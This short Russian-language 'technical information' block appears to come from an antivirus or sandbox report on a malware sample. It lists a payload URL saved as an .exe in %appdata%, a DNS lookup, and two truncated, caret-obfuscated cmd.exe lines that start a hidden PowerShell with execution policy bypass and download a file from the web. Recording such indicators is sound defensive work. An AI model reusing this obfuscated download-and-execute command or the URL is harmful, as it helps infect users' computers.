Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^wErsHEl^L^.^e^xe ^-E^XE^c^UTiOnP^o^LicY bypAS^s ^-^NoP^rO^fil^e^ ^-WINd^o^w^ST^yl^e hI^d^D^EN ^(NeW-^OB^j^E^c^T^ sySt^EM.N^eT.WEB^ClIeN^T^).D^o^WnL^oADf^il^e('http:/...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "pO^wErsHEl^L^.^e^xe ^-E^XE^c^UTiOnP^o^LicY bypAS^s ^-^NoP^rO^fil^e^ ^-WINd^o^w^ST^yl^e hI^d^D^EN ^(NeW-^OB^j^E^c^T^ sySt^EM.N^eT.WEB^ClIeN^T^).D^o^WnL^oADf^il^e('http:/...' (со скрытым окном)